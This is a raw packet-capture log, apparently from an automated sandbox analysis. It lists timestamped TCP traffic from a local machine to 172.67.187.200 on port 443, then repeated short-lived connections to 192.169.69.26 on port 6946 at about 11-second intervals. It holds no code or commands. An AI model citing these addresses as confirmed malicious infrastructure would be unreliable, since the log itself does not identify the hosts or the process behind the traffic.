                                                                            Dec 17, 2024 07:21:44.389214993 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.389255047 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.389291048 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.389547110 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.389569998 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.389615059 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.397561073 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.405994892 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.406055927 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.406069040 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.451240063 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.451246023 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.498125076 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.509413004 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.560653925 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.560682058 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.584919930 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.584994078 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.585005045 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.594517946 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.594573021 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.594578981 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.602459908 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.602511883 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.602519989 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.610483885 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.610529900 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.610537052 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.618509054 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.618565083 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.618582010 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.626473904 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.626528978 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.626538038 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.634506941 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.634567976 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.634584904 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.642523050 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.642608881 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.642688036 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.642694950 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.643698931 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.650461912 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.657128096 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.657233953 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.657253981 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.663636923 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.663710117 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.663727045 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.716955900 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.716986895 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.763806105 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.772979021 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.778969049 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.779046059 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.779071093 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.782674074 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.782732010 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.782741070 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.792495012 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.792534113 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.792574883 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.792602062 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.792613983 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.801651001 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.801736116 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.801876068 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.801898003 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.811114073 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.811187029 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.811196089 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.811243057 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.820395947 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.820416927 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.820466995 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.829847097 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.829866886 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.829912901 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.829940081 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.834739923 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.834759951 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.834811926 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.844049931 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.844155073 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.853594065 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.853683949 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.858274937 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.858362913 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.867640018 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.867726088 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.966974974 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.967122078 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.971889019 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.971962929 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.979042053 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.979115009 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.985975981 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.986073971 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.989144087 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.989237070 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:44.995984077 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:44.996058941 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.002058983 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.002127886 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.005296946 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.005383015 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.011746883 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.011847019 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.018132925 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.018238068 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.024543047 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.024646997 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.027899981 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.027962923 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.034223080 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.034297943 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.040560007 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.040632963 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.045381069 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.045469046 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.048770905 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.048855066 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.055119991 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.055201054 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.061523914 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.061615944 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.068126917 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.068206072 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.071365118 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.071429014 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.077632904 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.077699900 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.084096909 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.084208012 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.087259054 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.087340117 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.158396959 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.158545971 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.163572073 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.163654089 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.166145086 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.166213989 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.171076059 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.171178102 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.175754070 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.175837994 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.178292036 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.178365946 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.189472914 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.189547062 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.189587116 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.189646006 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.189671993 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.189686060 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.204278946 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.204349995 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.204377890 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.204395056 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.204427004 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.218409061 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.218471050 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.218609095 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.218609095 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.218628883 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.231420040 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.231465101 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.231534004 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.231543064 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.231554031 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.245032072 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.245093107 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.245147943 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.245156050 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.245177031 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.256939888 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.256982088 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.257066965 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.257076979 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.257105112 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.310650110 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.350080013 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.350100040 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.350126028 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.350197077 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.350214005 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.350224972 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.350251913 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.360383987 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.360409021 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.360513926 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.360527039 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.360589027 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.368907928 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.368930101 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.369014025 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.369024038 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.369066000 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.377249956 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.377270937 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.377378941 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.377388000 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.377427101 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.385936022 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.385983944 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.386023998 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.386032104 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.386040926 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.386068106 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.393668890 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.393733978 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.393781900 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.393788099 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.393810987 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.393826008 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.401741028 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.401786089 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.401825905 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.401833057 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.401843071 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.401869059 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.409049034 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.409095049 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.409157991 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.409168959 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.409184933 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.409213066 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.542072058 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.542099953 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.542278051 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.542298079 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.542344093 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.548576117 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.548598051 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.548700094 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.548708916 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.548752069 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.555488110 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.555509090 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.555583000 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.555588961 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.555629969 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.561147928 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.561167955 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.561229944 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.561237097 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.561278105 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.567792892 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.567811012 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.567920923 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.567928076 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.567972898 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.574105978 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.574130058 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.574201107 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.574207067 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.574248075 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.580784082 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.580800056 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.580868006 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.580873966 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.580913067 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.587414026 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.587445021 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.587503910 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.587510109 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.587542057 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.733935118 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.733954906 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.734055996 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.734066963 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.734121084 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.740505934 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.740521908 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.740607977 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.740613937 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.740649939 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.747241974 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.747256994 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.747349977 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.747355938 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.747406006 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.753108025 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.753123999 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.753227949 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.753233910 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.753283978 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.759768009 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.759784937 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.759896040 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.759902000 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.759948969 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.761606932 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.761691093 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.761698008 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.761758089 CET44349738172.67.187.200192.168.2.4
                                                                            Dec 17, 2024 07:21:45.761809111 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:45.765631914 CET49738443192.168.2.4172.67.187.200
                                                                            Dec 17, 2024 07:21:46.589982033 CET497396946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:21:46.709887981 CET694649739192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:21:46.709997892 CET497396946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:21:46.718131065 CET497396946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:21:46.837927103 CET694649739192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:21:57.084533930 CET694649739192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:21:57.084619999 CET497396946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:21:57.084733009 CET497396946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:21:57.205468893 CET694649739192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:21:58.093424082 CET497406946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:21:58.213566065 CET694649740192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:21:58.213654041 CET497406946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:21:58.216830015 CET497406946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:21:58.336517096 CET694649740192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:08.564424038 CET694649740192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:08.564508915 CET497406946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:08.564572096 CET497406946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:08.684350967 CET694649740192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:09.577523947 CET497536946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:09.697336912 CET694649753192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:09.699964046 CET497536946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:09.703337908 CET497536946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:09.823086023 CET694649753192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:20.200756073 CET694649753192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:20.200939894 CET497536946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:20.201060057 CET497536946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:20.320698977 CET694649753192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:21.202456951 CET497846946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:21.322771072 CET694649784192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:21.322967052 CET497846946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:21.326773882 CET497846946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:21.446430922 CET694649784192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:31.872895002 CET694649784192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:31.873035908 CET497846946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:31.873110056 CET497846946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:31.992925882 CET694649784192.169.69.26192.168.2.4
